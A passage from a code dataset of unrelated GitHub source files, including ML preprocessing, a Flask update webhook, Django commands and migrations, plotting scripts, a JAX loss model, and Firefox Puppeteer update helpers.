CAT_Array=preprocessing.scale(CAT_Array)\n\n ##onehot encode (group)\n group_test_OneHot = np_utils.to_categorical(test_ini['group'], num_classes=max(test_ini['group'])+1)\n group_train_OneHot = np_utils.to_categorical(train_ini['group'], num_classes=max(train_ini['group'])+1)\t\n\n CAT_GroupOneHot=np.concatenate((group_train_OneHot, group_test_OneHot), axis=0)\n CAT_GroupOneHot=preprocessing.scale(CAT_GroupOneHot)\n #XTrain=CAT[0:train_array1.shape[0],:]\n #XTest=CAT[train_array1.shape[0]:train_array1.shape[0]+test_array1.shape[0],:]\n\n ##combine array and onehot\n CAT=np.concatenate((CAT_Array, CAT_GroupOneHot), axis=1)\n XTrain=CAT[0:train_array1.shape[0],:]\n XTest=CAT[train_array1.shape[0]:train_array1.shape[0]+test_array1.shape[0],:]\n\n ##save preprocessing-data\n np.save('Xtrain', XTrain)\n #np.save('Xtrain', train_array_ini)\n np.save('Xtest', XTest)\n #np.save('Xtest', test_array_ini)\n np.save('Ytrain',pd.DataFrame.as_matrix(train_ini_00['label']))\n\ndef hi():\n\tprint(\"hello/n\")\n\t\ndef show_train_history(train_history,train,validation):\n\t#plot train history(with 
accuracy,loss)\n\tplt.plot(train_history.history[train])\n\tplt.plot(train_history.history[validation])\n\tplt.title('Train History')\n\tplt.ylabel(train)\n\tplt.xlabel('Epoch')\n\tplt.legend(['train','validation'], loc='upper left')\n\tplt.show()\t\n\t\t\t\n\t#Show Image\n\tfrom PIL import Image\n\tfile = Image.open(\"img.png\")\n\ndef my_onehot(t):\n\tfrom numpy import array\n\tfrom numpy import argmax\n\tfrom keras.utils import to_categorical\n\timport pandas as pd\n\t# define example\n\tdata = t\n\tdata = array(data)\n\t#print(data)\n\t# one hot encode\n\tencoded = to_categorical(data)\n\t#print(encoded)\n\t# invert encoding\n\tinverted = argmax(encoded[0])\n\t#print(inverted)\n\treturn encoded\n \ndef KNN_K1(Xtrain,Ytrian,Xtest,err,Name):\n\tfrom sklearn.neighbors.nearest_centroid import NearestCentroid\n\tclf = NearestCentroid()\n\tclf.fit(Xtrain, Ytrian)\n\ta=clf.predict(Xtest)\n\tresult = pd.read_csv(\"./upload\"+\".csv\", sep=',', delimiter=None)\n\t\n\tresult['proba']=a*(1.0-err[0])+(1-a)*err[1]\n\tresult.to_csv(Name[0]+str(Name[1])+\".csv\", sep=',', encoding='utf-8', index=False)\n","repo_name":"good5dog5/AI-Challenge","sub_path":"KNN/Stochastic_w6_1016_v5.0/myread.py","file_name":"myread.py","file_ext":"py","file_size_in_byte":4713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17663667996","text":"def copy_file(oldfile,newfile):\n\toldFile=open(oldfile,\"r\")\n\tnewFile=open(newfile,\"w\")\n\twhile True:\n\t\tfileContent=oldFile.read(50)\n\t\tif fileContent==\"\":\n\t\t\tbreak\n\t\tnewFile.write(fileContent)\n\toldFile.close()\n\tnewFile.close()\n\treturn\ncopy_file(\"d:\\\\python\\\\hello.txt\",\"d:\\\\python\\\\hello2.txt\")\n\n\n\n\n\n","repo_name":"yuyuanye/std_python","sub_path":"somethingneed/Python游戏超详细实战攻略-案例源码/第1章 源码/1.3 文件的使用/5-6.py","file_name":"5-6.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15792514759","text":"import logging\n\nfrom flask import current_app, request, abort\nfrom flask.blueprints import Blueprint\n\nfrom sipa.utils.git_utils import update_repo\n\n\nlogger = logging.getLogger(__name__)\n\nbp_hooks = Blueprint('hooks', __name__, url_prefix='/hooks')\n\n\n@bp_hooks.route('/update-content', methods=['POST'])\ndef content_hook():\n auth_key = current_app.config.get('GIT_UPDATE_HOOK_TOKEN')\n\n if not auth_key:\n # no key configured (default) → feature not enabled\n abort(404)\n\n key = request.args.get('token')\n if not key:\n logger.debug(\"`update-content` called without Token\",\n extra={'data': {'request_args': request.args}})\n abort(401)\n\n if key != auth_key:\n logger.warning(\"`update-content` called with wrong Token\",\n extra={'data': {'request_args': request.args,\n 'auth_key': auth_key}})\n abort(403)\n\n logger.info(\"Update hook triggered. 
Fetching content.\")\n    reload_necessary = update_repo(current_app.config['FLATPAGES_ROOT'])\n    if reload_necessary:\n        try:\n            import uwsgi\n        except ImportError:\n            logger.debug(\"UWSGI not present, skipping reload\")\n            pass\n        else:\n            logger.debug(\"Reloading UWSGI...\")\n            uwsgi.reload()\n\n    # 204: No content\n    # https://en.wikipedia.org/wiki/List_of_HTTP_status_codes#204\n    return \"\", 204\n","repo_name":"agdsn/sipa","sub_path":"sipa/blueprints/hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"}
+{"seq_id":"39110381728","text":"from django.core.management.base import BaseCommand, CommandError\nfrom meals.models import College, Restaurant\n\nCOLLEGE_NAME = \"yonsei\"\nKUKJE_RESTAURANTS = [\"Y-플라자\", \"송도1학사\", \"송도2학사\"]\nSTUDENT_RESTAURANTS = [\"카페테리아(맛나샘)\", \"푸드코트(부를샘)\"]\nHANKYUNG_RESTAURANTS = [\"한경관(교직원식당)\"]\n\nclass Command(BaseCommand):\n    help = 'Creates the necessary university and restaurants for the crawler'\n\n    def handle(self, *args, **options):\n        college, created = College.objects.get_or_create(name=COLLEGE_NAME)\n        if created:\n            self.stdout.write(self.style.SUCCESS('Successfully created \"%s\" university' % COLLEGE_NAME))\n        else:\n            self.stdout.write(self.style.WARNING('\"%s\" university already exists' % COLLEGE_NAME))\n        for name in KUKJE_RESTAURANTS + STUDENT_RESTAURANTS + HANKYUNG_RESTAURANTS:\n            _, created = Restaurant.objects.get_or_create(name=name, college=college)\n            if created:\n                self.stdout.write(self.style.SUCCESS('Successfully created \"%s\" restaurant' % name))\n","repo_name":"beotborry/collegemeals","sub_path":"yonsei/management/commands/initialize_yonsei.py","file_name":"initialize_yonsei.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"15055484280","text":"'''Rotation Program'''\r\ndef rotation(img, n):\r\n    try:\r\n        #This function rotates the image given 4 different degrees: 0 (a mirror), 90, 180, 270\r\n        im2=[] #Creates an empty list that the new values can be sorted into\r\n        if n==90:\r\n            for i in range(0,len(img[0])): #creates the width of the new image using the height of the original\r\n                new_row=[]\r\n                for j in range(0,len(img)): #creates the height of the new image using the width of the original\r\n                    new_row.append(img[-j-1][i]) #\"rotates\" the image by transcribing the i and j values of the image's matrix and adds it to a list\r\n                \r\n                im2.append(new_row)\r\n            \r\n            return im2\r\n        elif n==0:\r\n            for i in range(0,len(img)):\r\n                new_row=[]\r\n                for j in range(0,len(img[0])): #Retains original height and width\r\n                    new_row.append(img[i-1][-j-1]) #Appends list by flipping the original i and j locations\r\n                \r\n                im2.append(new_row)\r\n            \r\n            return im2\r\n        elif n==180:\r\n            for i in range(0,len(img)):\r\n                new_row=[]\r\n                for j in range(0,len(img[0])): \r\n                    new_row.append(img[-i][-j]) #Flips i and j values by making them negative\r\n                \r\n                im2.append(new_row)\r\n            \r\n            return im2\r\n        elif n==270:\r\n            for i in range(0,len(img[0])):\r\n                new_row=[]\r\n                for j in range(0,len(img)):\r\n                    new_row.append(img[j][-i-1]) #is the opposite of a 90 degree rotation, where j is positive, and i is -i-1\r\n                \r\n                im2.append(new_row)\r\n            \r\n            return im2\r\n    except:\r\n        return 
False","repo_name":"AineshSootha/ImageProcessingPython","sub_path":"rotation.py","file_name":"rotation.py","file_ext":"py","file_size_in_byte":1949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74220031468","text":"import json\nimport os\nimport numpy as np\nimport matplotlib.table as tab\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\nfrom CNNectome.utils import config_loader\n\niterations = list(range(30000, 210000, 10000))\ncolors = {\n \"classic\": (62 / 255.0, 150 / 255.0, 81 / 255.0),\n \"lite\": (57 / 255.0, 106 / 255.0, 177 / 255.0),\n \"deluxe\": (218 / 255.0, 124 / 255.0, 48 / 255.0),\n \"data2016-aligned\": (218 / 255.0, 124 / 255.0, 48 / 255.0),\n \"data2016-unaligned\": (57 / 255.0, 106 / 255.0, 177 / 255.0),\n \"data2017-unaligned\": (62 / 255.0, 150 / 255.0, 81 / 255.0),\n \"data2017-aligned\": (204 / 255.0, 37 / 255.0, 41 / 255.0),\n}\nlinestyles = {\n \"data2017-aligned\": \"-\",\n \"data2017-unaligned\": \"--\",\n \"data2016-aligned\": \"-.\",\n \"data2016-unaligned\": \":\",\n}\n\n\ndef load_result(data_train, augmentation, data_eval, iteration, mode):\n result_json = os.path.join(\n config_loader.get_config()[\"synapses\"][\"training_setups_path\"],\n \"data_and_augmentations\",\n data_train,\n augmentation,\n \"evaluation\",\n str(iteration),\n data_eval,\n \"partners.{0:}.json\".format(mode),\n )\n try:\n with open(result_json, \"r\") as f:\n resdict = json.load(f)\n except IOError:\n return None\n return resdict\n\n\ndef compute_cremi_score(\n samples, data_train, augmentation, data_eval, iteration, mode, metric=\"fscore\"\n):\n result = load_result(data_train, augmentation, data_eval, iteration, mode)\n if result is None:\n return 1.0\n score = 0.0\n for s in samples:\n if result[s][metric] is not None:\n score += result[s][metric]\n else:\n score += 0.0\n score /= len(samples)\n return 1.0 - score\n\n\ndef plot_cremi_score_by_iteration(\n samples,\n data_train,\n augmentation,\n data_eval,\n metric=\"fscore\",\n color=(62 / 255.0, 150 / 255.0, 81 / 255.0),\n):\n training_cremi_scores = []\n validation_cremi_scores = []\n\n for i in iterations:\n training_cremi_scores.append(\n compute_cremi_score(\n samples,\n data_train,\n augmentation,\n data_eval,\n i,\n \"training\",\n metric=metric,\n )\n )\n validation_cremi_scores.append(\n compute_cremi_score(\n samples,\n data_train,\n augmentation,\n data_eval,\n i,\n \"validation\",\n metric=metric,\n )\n )\n minit_training = np.nanargmin(training_cremi_scores)\n minit_validation = np.nanargmin(validation_cremi_scores)\n plt.plot(\n iterations,\n training_cremi_scores,\n ls=\"--\",\n c=color,\n label=data_eval + \", training\",\n linewidth=0.5,\n )\n plt.plot(\n iterations[minit_training],\n training_cremi_scores[minit_training],\n c=color,\n marker=\"o\",\n alpha=0.5,\n )\n plt.plot(\n iterations,\n validation_cremi_scores,\n ls=\"-\",\n c=color,\n label=data_eval + \", validation\",\n )\n plt.plot(\n iterations[minit_validation],\n validation_cremi_scores[minit_validation],\n c=color,\n marker=\"o\",\n )\n plt.annotate(\n \"{0:.2f}\".format(validation_cremi_scores[minit_validation]),\n [iterations[minit_validation], validation_cremi_scores[minit_validation]],\n [4, -7],\n textcoords=\"offset points\",\n color=color,\n )\n\n plt.ylim([0.1, 1.0])\n plt.xlim([20000, 210000])\n\n plt.legend()\n plt.xlabel(\"iterations\")\n ylabel = \"CREMI score on \"\n for s in samples:\n ylabel += s\n if s != 
samples[-1]:\n ylabel += \", \"\n plt.ylabel(ylabel)\n\n\nif __name__ == \"__main__\":\n samples = [\"A\", \"B\", \"C\"]\n data_train = [\"data2017-aligned\", \"data2017-unaligned\"]\n data_eval = [\"data2017-aligned\", \"data2017-unaligned\"]\n for k, dt in enumerate(data_train):\n plt.subplot(\"\".join((\"2\", str(len(data_train)), str(k + 1))))\n plt.title(\"train on \" + dt)\n for de in data_eval:\n plot_cremi_score_by_iteration(samples, dt, \"deluxe\", de, color=colors[de])\n data_train = [\"data2016-aligned\", \"data2016-unaligned\"]\n data_eval = [\"data2016-aligned\", \"data2016-unaligned\"]\n for l, dt in enumerate(data_train):\n plt.subplot(\"\".join((\"2\", str(len(data_train)), str(k + l + 2))))\n plt.title(\"train on \" + dt)\n for de in data_eval:\n plot_cremi_score_by_iteration(samples, dt, \"deluxe\", de, color=colors[de])\n\n plt.show()\n","repo_name":"saalfeldlab/CNNectome","sub_path":"CNNectome/visualization/analysis_prepostscores.py","file_name":"analysis_prepostscores.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"24789050381","text":"\"\"\"Base model with NCR regularisation losses.\"\"\"\n\nimport functools\nfrom typing import Dict, Optional, Tuple, Union\n\nfrom flax.training import common_utils\nfrom immutabledict import immutabledict\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nfrom scenic.model_lib.base_models import base_model\nfrom scenic.model_lib.base_models import classification_model\nfrom scenic.model_lib.base_models import model_utils\nfrom scenic.projects.ncr import loss\n\nArray = Union[jnp.ndarray, np.ndarray]\n\n_CLASSIFICATION_METRICS = immutabledict({\n 'accuracy':\n (model_utils.weighted_correctly_classified, model_utils.num_examples),\n 'loss_xentropy': (model_utils.weighted_unnormalized_softmax_cross_entropy,\n model_utils.num_examples),\n})\n\n\nclass NCRModel(base_model.BaseModel):\n \"\"\"Abstract class for model with NCR losses.\n\n Supports both softmax-classification and multi-label classification models.\n \"\"\"\n\n def loss_function( # pytype: disable=signature-mismatch # overriding-return-type-checks\n self,\n logits: Array,\n batch: base_model.Batch,\n use_ncr: bool = False,\n use_bootstrap: bool = False,\n features: Optional[Array] = None,\n memory_logits: Optional[Array] = None,\n memory_features: Optional[Array] = None,\n loss_weight: Optional[float] = 0.0,\n model_params: Optional[Array] = None) -> Tuple[float, Dict[str, Array]]:\n\n if use_ncr:\n return self.ncr_loss(logits, batch, features, memory_logits,\n memory_features, loss_weight, model_params)\n else:\n return self.ce_loss(logits, batch, model_params, use_bootstrap,\n loss_weight)\n\n def ce_loss(\n self,\n logits: Array,\n batch: base_model.Batch,\n model_params: Optional[Array] = None,\n use_bootstrap: bool = False,\n loss_weight: Optional[float] = 1.0) -> Tuple[float, Dict[str, Array]]:\n \"\"\"Returns softmax cross entropy loss with an L2 penalty on the weights.\n\n Args:\n logits: Output of model in shape [batch, length, num_classes].\n batch: Batch of data that has 'label' and optionally 'batch_mask'.\n model_params: Parameters of the model, for optionally applying\n regularization.\n use_bootstrap: Enable the bootstrap loss term\n loss_weight: Weight for the bootstrap loss term\n\n Returns:\n Total loss.\n \"\"\"\n weights = batch.get('batch_mask')\n loss_metrics = {}\n\n if self.dataset_meta_data.get('target_is_onehot', False):\n one_hot_targets 
= batch['label']\n else:\n one_hot_targets = common_utils.onehot(batch['label'], logits.shape[-1])\n\n softmax_ce_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n one_hot_targets,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n loss_metrics['softmax_cross_entropy'] = softmax_ce_loss\n\n if self.config.get('l2_decay_factor') is None:\n total_loss = softmax_ce_loss\n else:\n l2_loss = model_utils.l2_regularization(model_params)\n total_loss = softmax_ce_loss + 0.5 * self.config.l2_decay_factor * l2_loss\n\n if use_bootstrap:\n bootstrap_labels = jax.nn.softmax(logits)\n bootstrap_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n bootstrap_labels,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n total_loss = (1.0 - loss_weight) * total_loss + (\n loss_weight * bootstrap_loss)\n\n # Add the dummy entry for the NCR loss\n loss_metrics['ncr_loss'] = 0.0\n loss_metrics['total_loss'] = total_loss\n\n return total_loss, loss_metrics # pytype: disable=bad-return-type # jax-ndarray\n\n def ncr_loss(\n self,\n logits: Array,\n batch: base_model.Batch,\n features: Array,\n batch_logits: Array,\n batch_features: Array,\n ncr_loss_weight: float,\n model_params: Optional[Array] = None) -> Tuple[float, Dict[str, Array]]:\n \"\"\"Returns softmax cross entropy loss with an L2 penalty on the weights.\n\n Args:\n logits: Output of model in shape [batch, length, num_classes].\n batch: Batch of data that has 'label' and optionally 'batch_mask'.\n features: Feature embeddings of batch inputs,\n batch_logits: Logits corresponding to the batch items to be queried from\n batch_features: Features corresponding to the batch items to be queried\n from\n ncr_loss_weight: The weight of the NCR loss term\n model_params: Parameters of the model, for optionally applying\n regularization.\n\n Returns:\n Total loss.\n \"\"\"\n weights = batch.get('batch_mask')\n loss_metrics = {}\n\n if self.dataset_meta_data.get('target_is_onehot', False):\n one_hot_targets = batch['label']\n else:\n one_hot_targets = common_utils.onehot(batch['label'], logits.shape[-1])\n\n softmax_ce_loss = model_utils.weighted_softmax_cross_entropy(\n logits,\n one_hot_targets,\n weights,\n label_smoothing=self.config.get('label_smoothing'))\n\n softmax_ce_loss = (1.0 - ncr_loss_weight) * softmax_ce_loss\n loss_metrics['softmax_cross_entropy'] = softmax_ce_loss\n if self.config.get('l2_decay_factor') is None:\n total_loss = softmax_ce_loss\n else:\n l2_loss = model_utils.l2_regularization(model_params)\n total_loss = softmax_ce_loss + 0.5 * self.config.l2_decay_factor * l2_loss\n\n # Add NCR loss\n ncr_loss = loss.ncr_loss(\n logits, features, batch_logits, batch_features,\n number_neighbours=self.config.ncr.number_neighbours,\n smoothing_gamma=self.config.ncr.smoothing_gamma,\n temperature=self.config.ncr.temperature,\n example_weights=weights)\n total_loss += ncr_loss_weight * ncr_loss\n loss_metrics['ncr_loss'] = ncr_loss\n loss_metrics['total_loss'] = total_loss\n\n return total_loss, loss_metrics # pytype: disable=bad-return-type # jax-ndarray\n\n def get_metrics_fn(self, split: Optional[str] = None) -> base_model.MetricFn:\n \"\"\"Returns a callable metric function for the model.\n\n Args:\n split: The split for which we calculate the metrics. 
It should be one of\n the ['train', 'validation', 'test'].\n Returns: A metric function with the following API: ```metrics_fn(logits,\n batch)```\n \"\"\"\n del split # For all splits, we return the same metric functions.\n\n return functools.partial(\n classification_model.classification_metrics_function,\n target_is_onehot=self.dataset_meta_data.get('target_is_onehot',\n False),\n metrics=_CLASSIFICATION_METRICS)\n","repo_name":"google-research/scenic","sub_path":"scenic/projects/ncr/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":6628,"program_lang":"python","lang":"en","doc_type":"code","stars":2619,"dataset":"github-code","pt":"37"} +{"seq_id":"71639380266","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Generated by Django 3.2.13 on 2022-09-06 09:57\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import migrations, models\n\nMODEL_TYPE = {\n \"adcm\": \"adcm\",\n \"cluster\": \"cluster\",\n \"clusterobject\": \"service\",\n \"servicecomponent\": \"component\",\n \"hostprovider\": \"provider\",\n \"host\": \"host\",\n}\n\n\ndef _get_host_action_context(apps, obj, task):\n Prototype = apps.get_model(\"cm\", \"Prototype\")\n ClusterObject = apps.get_model(\"cm\", \"ClusterObject\")\n ServiceComponent = apps.get_model(\"cm\", \"ServiceComponent\")\n cluster = obj.cluster\n context = {\"cluster\": {\"id\": cluster.pk, \"name\": cluster.name}}\n\n if task.action.prototype.type == \"service\":\n try:\n service_prototype = Prototype.objects.get(\n type=task.action.prototype.type,\n name=task.action.prototype.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=None,\n )\n service = ClusterObject.objects.get(prototype=service_prototype, cluster=cluster)\n except ObjectDoesNotExist:\n context = {}\n else:\n context[\"service\"] = {\"id\": service.pk, \"name\": service.prototype.display_name}\n\n elif task.action.prototype.type == \"component\":\n try:\n service_prototype = Prototype.objects.get(\n type=task.action.prototype.parent.type,\n name=task.action.prototype.parent.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=None,\n )\n service = ClusterObject.objects.get(prototype=service_prototype, cluster=cluster)\n component_prototype = Prototype.objects.get(\n type=task.action.prototype.type,\n name=task.action.prototype.name,\n bundle=cluster.prototype.bundle,\n version=cluster.prototype.version,\n parent=service_prototype,\n )\n component = ServiceComponent.objects.get(\n cluster=cluster,\n service=service,\n prototype=component_prototype,\n )\n except ObjectDoesNotExist:\n context = {}\n else:\n context[\"service\"] = {\"id\": service.pk, \"name\": service.prototype.display_name}\n context[\"component\"] = {\n \"id\": component.pk,\n \"name\": component.prototype.display_name,\n }\n return context\n\n\ndef _fix_selector(selector, _models):\n fixed_selector = {}\n for object_type, object_id in selector.items():\n model, name_attr = _models.get(object_type, 
(None, None))\n\n if not model:\n continue\n\n obj = model.objects.filter(pk=object_id).first()\n if not obj:\n continue\n\n if object_type in {\"service\", \"component\"}:\n obj = obj.prototype\n\n fixed_selector[object_type] = {\"id\": object_id, \"name\": getattr(obj, name_attr)}\n\n return fixed_selector\n\n\ndef get_selector(apps, schema_editor):\n TaskLog = apps.get_model(\"cm\", \"TaskLog\")\n\n _models = {\n \"adcm\": (apps.get_model(\"cm\", \"ADCM\"), \"name\"),\n \"cluster\": (apps.get_model(\"cm\", \"Cluster\"), \"name\"),\n \"service\": (apps.get_model(\"cm\", \"ClusterObject\"), \"display_name\"),\n \"component\": (apps.get_model(\"cm\", \"ServiceComponent\"), \"display_name\"),\n \"provider\": (apps.get_model(\"cm\", \"HostProvider\"), \"name\"),\n \"host\": (apps.get_model(\"cm\", \"Host\"), \"fqdn\"),\n }\n\n for task in TaskLog.objects.all():\n if task.selector:\n selector = _fix_selector(task.selector, _models)\n else:\n if not task.object_type:\n continue\n\n model, _ = _models.get(MODEL_TYPE[task.object_type.model], (None, None))\n\n if not model:\n continue\n\n obj = model.objects.filter(pk=task.object_id).first()\n if not obj:\n continue\n\n selector = {}\n\n if obj.prototype.type in {\"adcm\", \"cluster\", \"provider\"}:\n selector[obj.prototype.type] = {\"id\": obj.pk, \"name\": obj.name}\n elif obj.prototype.type == \"service\":\n selector[\"cluster\"] = {\"id\": obj.cluster.pk, \"name\": obj.cluster.name}\n selector[\"service\"] = {\"id\": obj.pk, \"name\": obj.prototype.display_name}\n elif obj.prototype.type == \"component\":\n selector[\"cluster\"] = {\"id\": obj.cluster.pk, \"name\": obj.cluster.name}\n selector[\"service\"] = {\n \"id\": obj.service.pk,\n \"name\": obj.service.prototype.display_name,\n }\n selector[\"component\"] = {\"id\": obj.pk, \"name\": obj.prototype.display_name}\n elif obj.prototype.type == \"host\":\n selector[\"host\"] = {\"id\": obj.pk, \"name\": obj.fqdn}\n if task.action and task.action.host_action:\n context = _get_host_action_context(apps, obj, task)\n selector.update(context)\n else:\n selector[\"provider\"] = {\n \"id\": obj.provider.pk,\n \"name\": obj.provider.name,\n }\n\n task.selector = selector\n task.save(update_fields=[\"selector\"])\n task.joblog_set.filter().update(selector=selector)\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n (\"cm\", \"0091_migrate_adcm_logrotate_config\"),\n ]\n\n operations = [\n migrations.AlterField(\n model_name=\"prototype\",\n name=\"type\",\n field=models.CharField(\n choices=[\n (\"adcm\", \"adcm\"),\n (\"cluster\", \"cluster\"),\n (\"service\", \"service\"),\n (\"component\", \"component\"),\n (\"provider\", \"provider\"),\n (\"host\", \"host\"),\n ],\n max_length=16,\n ),\n ),\n migrations.AlterField(\n model_name=\"stageprototype\",\n name=\"type\",\n field=models.CharField(\n choices=[\n (\"adcm\", \"adcm\"),\n (\"cluster\", \"cluster\"),\n (\"service\", \"service\"),\n (\"component\", \"component\"),\n (\"provider\", \"provider\"),\n (\"host\", \"host\"),\n ],\n max_length=16,\n ),\n ),\n migrations.RunPython(get_selector),\n ]\n","repo_name":"arenadata/adcm","sub_path":"python/cm/migrations/0092_auto_20220906_0957.py","file_name":"0092_auto_20220906_0957.py","file_ext":"py","file_size_in_byte":7183,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"13715372007","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this file,\n# You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\nimport re\n\nimport mozinfo\n\nfrom firefox_puppeteer.base import BaseLib\nfrom firefox_puppeteer.api.appinfo import AppInfo\nfrom firefox_puppeteer.api.prefs import Preferences\n\n\nclass ActiveUpdate(BaseLib):\n\n def __getattr__(self, attr):\n value = self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate[arguments[0]];\n \"\"\", script_args=[attr])\n\n if value:\n return value\n else:\n raise AttributeError('{} has no attribute {}'.format(self.__class__.__name__,\n attr))\n\n @property\n def exists(self):\n \"\"\"Checks if there is an active update.\n\n :returns: True if there is an active update\n \"\"\"\n active_update = self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate;\n \"\"\")\n\n return bool(active_update)\n\n def get_patch_at(self, patch_index):\n \"\"\"Use nsIUpdate.getPatchAt to return a patch from an update.\n\n :returns: JSON data for an nsIUpdatePatch object\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.getPatchAt(arguments[0]);\n \"\"\", script_args=[patch_index])\n\n @property\n def patch_count(self):\n \"\"\"Get the patchCount from the active update.\n\n :returns: The patch count\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.patchCount;\n \"\"\")\n\n @property\n def selected_patch(self):\n \"\"\"Get the selected patch for the active update.\n\n :returns: JSON data for the selected patch\n \"\"\"\n return self.marionette.execute_script(\"\"\"\n let ums = Components.classes['@mozilla.org/updates/update-manager;1']\n .getService(Components.interfaces.nsIUpdateManager);\n return ums.activeUpdate.selectedPatch;\n \"\"\")\n\n\nclass MARChannels(BaseLib):\n \"\"\"Class to handle the allowed MAR channels as listed in update-settings.ini.\"\"\"\n INI_SECTION = 'Settings'\n INI_OPTION = 'ACCEPTED_MAR_CHANNEL_IDS'\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self._ini_file_path = self.marionette.execute_script(\"\"\"\n Components.utils.import('resource://gre/modules/Services.jsm');\n\n let file = Services.dirsvc.get('GreD', Components.interfaces.nsIFile);\n file.append('update-settings.ini');\n\n return file.path;\n \"\"\")\n\n @property\n def config_file_path(self):\n \"\"\"The path to the update-settings.ini file.\"\"\"\n return self._ini_file_path\n\n @property\n def config_file_contents(self):\n \"\"\"The contents of the update-settings.ini file.\"\"\"\n with open(self.config_file_path) as f:\n return f.read()\n\n @property\n def channels(self):\n \"\"\"The channels as found in the ACCEPTED_MAR_CHANNEL_IDS option\n of the update-settings.ini file.\n\n :returns: A set of channel names\n \"\"\"\n channels = self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/FileUtils.jsm\");\n let iniFactory = Components.classes['@mozilla.org/xpcom/ini-processor-factory;1']\n 
.getService(Components.interfaces.nsIINIParserFactory);\n\n let file = new FileUtils.File(arguments[0]);\n let parser = iniFactory.createINIParser(file);\n\n return parser.getString(arguments[1], arguments[2]);\n \"\"\", script_args=[self.config_file_path, self.INI_SECTION, self.INI_OPTION])\n return set(channels.split(','))\n\n @channels.setter\n def channels(self, channels):\n \"\"\"Set the channels in the update-settings.ini file.\n\n :param channels: A set of channel names\n \"\"\"\n new_channels = ','.join(channels)\n self.marionette.execute_script(\"\"\"\n Components.utils.import(\"resource://gre/modules/FileUtils.jsm\");\n let iniFactory = Components.classes['@mozilla.org/xpcom/ini-processor-factory;1']\n .getService(Components.interfaces.nsIINIParserFactory);\n\n let file = new FileUtils.File(arguments[0]);\n\n let writer = iniFactory.createINIParser(file)\n .QueryInterface(Components.interfaces.nsIINIParserWriter);\n\n writer.setString(arguments[1], arguments[2], arguments[3]);\n writer.writeFile(null, Components.interfaces.nsIINIParserWriter.WRITE_UTF16);\n \"\"\", script_args=[self.config_file_path, self.INI_SECTION, self.INI_OPTION, new_channels])\n\n def add_channels(self, channels):\n \"\"\"Add channels to the update-settings.ini file.\n\n :param channels: A set of channel names to add\n \"\"\"\n self.channels = self.channels | set(channels)\n\n def remove_channels(self, channels):\n \"\"\"Remove channels from the update-settings.ini file.\n\n :param channels: A set of channel names to remove\n \"\"\"\n self.channels = self.channels - set(channels)\n\n\nclass SoftwareUpdate(BaseLib):\n \"\"\"The SoftwareUpdate API adds support for an easy access to the update process.\"\"\"\n PREF_APP_DISTRIBUTION = 'distribution.id'\n PREF_APP_DISTRIBUTION_VERSION = 'distribution.version'\n PREF_APP_UPDATE_URL = 'app.update.url'\n PREF_APP_UPDATE_URL_OVERRIDE = 'app.update.url.override'\n PREF_DISABLED_ADDONS = 'extensions.disabledAddons'\n\n def __init__(self, marionette_getter):\n BaseLib.__init__(self, marionette_getter)\n\n self.app_info = AppInfo(marionette_getter)\n self.prefs = Preferences(marionette_getter)\n\n self._update_channel = UpdateChannel(marionette_getter)\n self._mar_channels = MARChannels(marionette_getter)\n self._active_update = ActiveUpdate(marionette_getter)\n\n @property\n def ABI(self):\n \"\"\"Get the customized ABI for the update service.\n\n :returns: ABI version\n \"\"\"\n abi = self.app_info.XPCOMABI\n if mozinfo.isMac:\n abi += self.marionette.execute_script(\"\"\"\n let macutils = Components.classes['@mozilla.org/xpcom/mac-utils;1']\n .getService(Components.interfaces.nsIMacUtils);\n if (macutils.isUniversalBinary) {\n return '-u-' + macutils.architecturesInBinary;\n }\n return '';\n \"\"\")\n\n return abi\n\n @property\n def active_update(self):\n 